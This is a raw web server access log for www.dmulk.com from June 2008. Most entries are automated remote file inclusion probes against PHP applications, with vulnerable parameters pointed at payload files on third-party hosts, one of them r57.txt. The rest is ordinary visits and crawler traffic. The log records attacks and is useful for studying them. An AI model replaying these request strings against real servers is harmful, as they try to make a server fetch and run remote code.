212.34.153.42 - - [08/Jun/2008:11:57:08 -0700] "GET /logs/?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 200 50988 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:57:16 -0700] "GET /drop/stoc HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:57:17 -0700] "GET /logs/access_080103.log/?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:57:17 -0700] "GET /logs/index.php?ort=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:57:19 -0700] "GET /index.php?ort=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 200 16837 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:11:57:21 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:57:22 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:57:23 -0700] "GET /drop/stoc HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:11:57:26 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16849 "-" "libwww-perl/5.805" "www.dmulk.com"
84.16.224.119 - - [08/Jun/2008:11:57:27 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:57:28 -0700] "GET /drop/stoc HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:57:35 -0700] "GET /drop/STOC HTTP/1.1" 301 94 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:57:35 -0700] "GET /drop/STOC/ HTTP/1.1" 200 537 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:57:35 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:57:35 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.175.25 - - [08/Jun/2008:11:57:35 -0700] "GET /logs//db.php?path_local=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:57:50 -0700] "GET /STOC HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:57:51 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:11:57:57 -0700] "GET /errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:11:57:57 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:11:57:57 -0700] "GET /logs/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:11:57:57 -0700] "GET /logs/access.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:58:00 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:58:05 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:58:08 -0700] "GET /logs/access_080120.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:58:09 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:58:09 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:58:10 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:58:12 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:58:14 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:58:15 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.182.209 - - [08/Jun/2008:11:58:15 -0700] "GET /logs/access_080111.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:58:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:11:58:15 -0700] "GET /logs/access_080220.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:11:58:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:11:58:30 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
77.55.90.2 - - [08/Jun/2008:11:58:32 -0700] "GET /logs//popup_window.php?site_isp_root=http://hotelfenix.pl/doc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [08/Jun/2008:11:58:33 -0700] "GET //popup_window.php?site_isp_root=http://hotelfenix.pl/doc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:58:38 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:58:38 -0700] "GET //include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:58:39 -0700] "GET /logs//include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:58:39 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:58:40 -0700] "GET /logs/access_080223.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:58:45 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:11:58:45 -0700] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:58:48 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:58:52 -0700] "GET /drop/STOC HTTP/1.1" 301 94 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:58:53 -0700] "GET /drop/STOC/ HTTP/1.1" 200 537 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:11:58:56 -0700] "GET /drop/ HTTP/1.1" 200 655 "http://www.dmulk.com/drop/STOC/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:59:12 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:59:14 -0700] "GET /index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:59:14 -0700] "GET /logs/index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:59:15 -0700] "GET /logs/access_080217.log//tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:59:16 -0700] "GET //tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:59:16 -0700] "GET /logs//tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:59:41 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:59:47 -0700] "GET /drop/STOC HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:59:51 -0700] "GET /home.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:59:51 -0700] "GET /logs/home.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:12:00:24 -0700] "GET /logs/index.php?pagename=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:12:00:29 -0700] "GET /index.php?pagename=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 200 5829 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:00:38 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:12:01:07 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:12:01:11 -0700] "GET /logs/access_080223.log/index2.php?page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:12:01:12 -0700] "GET /index2.php?page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:12:01:12 -0700] "GET /logs/index2.php?page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:12:01:24 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:12:01:35 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:12:01:39 -0700] "GET //errors.php?error=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:12:01:41 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:12:02:16 -0700] "GET /logs/index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:12:02:18 -0700] "GET /index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 200 16803 "-" "libwww-perl/5.65" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:03:23 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:03:24 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.47.60.169 - - [08/Jun/2008:12:03:53 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
61.47.60.169 - - [08/Jun/2008:12:03:53 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.67.27.164 - - [08/Jun/2008:12:03:56 -0700] "GET /logs/access_080310.log/errors.php?error=http://www.hoogmartens.eu/universerox/r0x/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:04:09 -0700] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:04:10 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:04:10 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:04:20 -0700] "GET /menu.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:04:20 -0700] "GET /logs/menu.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:12:04:32 -0700] "GET /logs/str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:12:04:32 -0700] "GET /logs/access_080429.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:12:04:33 -0700] "GET /str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:12:04:57 -0700] "GET /logs/str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:12:04:57 -0700] "GET /str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:12:04:57 -0700] "GET /logs/str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:12:04:57 -0700] "GET /str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.190.212.202 - - [08/Jun/2008:12:05:11 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.212.202 - - [08/Jun/2008:12:05:12 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.212.202 - - [08/Jun/2008:12:05:12 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:12:05:27 -0700] "GET /logs/str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:12:05:28 -0700] "GET /str.php?lang=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.115 - - [08/Jun/2008:12:05:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.91 - - [08/Jun/2008:12:05:47 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:05:53 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:12:06:03 -0700] "GET /logs/str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:12:06:04 -0700] "GET /str.php?lang=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:06:36 -0700] "GET /drop/stoc HTTP/1.1" 301 94 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:06:37 -0700] "GET /drop/stoc/ HTTP/1.1" 200 677 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.53.114.42 - - [08/Jun/2008:12:06:41 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://www.symbols-larp.com/php/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - dmulk [08/Jun/2008:12:06:42 -0700] "GET /drop/stoc/SANY0004.JPG HTTP/1.1" 200 1991141 "http://www.dmulk.com/drop/stoc/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
96.229.195.95 - - [08/Jun/2008:12:06:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
